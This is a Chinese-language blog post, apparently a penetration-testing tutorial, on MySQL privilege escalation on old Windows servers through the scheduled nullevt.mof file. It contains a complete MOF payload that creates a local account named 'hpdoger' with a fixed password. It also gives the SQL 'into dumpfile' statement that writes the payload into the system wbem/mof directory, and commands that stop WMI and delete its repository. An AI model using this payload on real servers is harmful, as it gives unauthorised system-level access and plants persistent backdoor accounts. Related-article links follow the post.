2. 程式人生 > 其它 >Mysql提權(三)---MOF提權

Mysql提權(三)---MOF提權

阿新 發佈:2021-07-05

一、原理

利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 檔案,每分鐘都會在一個特定的時間去執行一次的特性,來寫入我們的cmd命令使其被帶入執行,以系統許可權執行

二、提權的條件

1.windows 03及以下版本
2.mysql啟動身份具有許可權去讀寫c:/windows/system32/wbem/mof目錄
3.secure-file-priv引數不為null

三、nullevt.mof的利用程式碼

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

四、上傳mof

使用sql語句將檔案匯入到c:/windows/system32/wbem/mof/ (一般是win2003 ,Windows2008以上由於保護機制,較少能夠成功(無法寫入))

select load_file("C:/phpStudy/WWW/222.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

要注意的是,這裡不能使用outfile,因為會在末端寫入新行,因此mof在被當作二進位制檔案無法正常執行,所以我們用dumpfile匯出一行資料

五、關於MOF提權的弊端

我們提權成功後,就算被刪號,mof也會在五秒內將原賬號重建,那麼這給我們退出測試造成了很大的困擾,所以謹慎使用。那麼我們如何刪掉我們的入侵賬號呢?
cmd 下執行下面語句:

net stop winmgmt
del c:/windows/system32/wbem/repository
net start winmgmt

相關推薦

Mysql()---MOF

一、原理 利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 檔案,每分鐘都會在一個特定的時間去執行一次的特性,來寫入我們的cmd命令使其被帶入執行,以系統許可權執行

Mysql(二)---UDF

零、參考連結 https://www.sqlsec.com/2020/11/mysql.html#toc-heading-10 一、原理 UDF是mysql的一個拓展介面,UDF(Userdefined function)可翻譯為使用者自定義函式,這個是用來拓展Mysql的技術手段。

Python3.6簡單的操作Mysql資料庫的個例項

安裝pymysql 參考:https://github.com/PyMySQL/PyMySQL/ pip install pymsql 例項一 import pymysql # 建立連線

Python操作MySQL資料庫的種方法總結

1. MySQLdb 的使用 (1) 什麼是MySQLdb? MySQLdb 是用於 Python 連線 MySQL 資料庫的介面,它實現了 Python 資料庫 API 規範 V2.0,基於 MySQL C API 上建立的。

Mysql進階:排序查詢

進階:排序查詢 USE myemployees; SELECT * FROM employees; 語法: SELECT 查詢列表 FROM 表 【WHERE 篩選條件】

MySQL資料庫()——資料庫配置管理

資料庫配置管理 使用者以及密碼管理 新建使用者:create user ‘username’@‘%’ identified by ‘password’

Mysql資料庫設計正規化例項解析

正規化 1NF:欄位不可分; 2NF:有主鍵,非主鍵欄位依賴主鍵; 3NF:非主鍵欄位不能相互依賴;

MySQL效能優化():深入理解索引的這點事

索引,對於良好的資料庫效能非常關鍵。只要提及到資料庫效能優化,都會首先想到“索引”,看看錶中是否新增索引。尤其是當表中的資料量越來越大時,索引對效能的影響尤為突出。在資料量較小且負載較低時,沒有索引或

MySql的回顧:流程控制函式/統計函式/分組查詢

路漫漫其修遠兮,吾將上下而求索,又到了週末,我繼續帶各位看官學習回顧Mysql知識。

介面測試中的cookie鑑和token鑑

  在講今天的內容之前,我們應該先了解一些基本的基礎知識,要不然,突然講鑑,可能有點懵,聽不太懂,所以,我會先把基礎的東西先梳理一遍

PHP連線MySQL資料庫的種方式

本篇文章給大家介紹一下PHP連線MySQL資料庫的種方式(mysql、mysqli、pdo),結合例項形式分析了PHP基於mysql、mysqli、pdo種方式連線MySQL資料庫的相關操作技巧與注意事項。有一定的參考價值,有需要的朋友可以

MySQL學習筆記MySQL安裝後的一些設定

一、環境變數 1.1、MySQL除了可以用MySQL 5.7 Command Line Client操作外,也可以使用Windows下的命令操作符進行操作。

Mysql複製表種實現方法及grant解析

如何快速的複製一張表 首先建立一張表db1.t,並且插入1000行資料,同時建立一個相同結構的表db2.t

MySQL隨筆(

MySQL計算兩個日期相差的天數,月數,年數 格式化日期: date_format(repay_time,\'%Y-%m-%d\')

MYSQL複習——第章:檔案(日誌檔案+其他)

3.1 日誌檔案 錯誤日誌(error log)查詢日誌 (log)慢查詢日誌 (slow query log)事務日誌 (redo log + undo log)

2020-11-08:在Mysql中,個欄位A、B、C的聯合索引,查詢條件是B、A、C,會用到索引嗎?

福哥答案2020-11-08: 會走索引,原因是mysql優化器會把BAC優化成ABC。 CREATE TABLE `t_testabc2` (

MYSQL 索引()--- SQL日誌分析

慢查詢日誌 Mysql 的慢查詢日誌是 Myql 提供的一種日誌記錄,用來記錄在 Myql 中響應時間查過閾值的語句,具體指執行時間超過 long_query_time 值的 SQL,則會被記錄在日誌中。long_query_time預設為 10,單位為秒。

樹鏈剖分邊轉化為點

現在給出將樹鏈剖分上的邊轉化為點的方法 也就是將邊轉到它下方的點去

php連線MySQL資料庫的種方式(mysql/mysqli/pdo)

引言 PHP與MySQL的連線有種API介面,分別是:PHP的MySQL擴充套件 、PHP的mysqli擴充套件 、PHP資料物件(PDO) ,下面針對以上種連線方式做下總結,以備在不同場景下選出最優方案。

Linux 修改Mysql密碼的種方式(轉載)

註明:本文為轉載,原文地址:https://www.cnblogs.com/chuckjam/archive/2018/08/10/9456255.html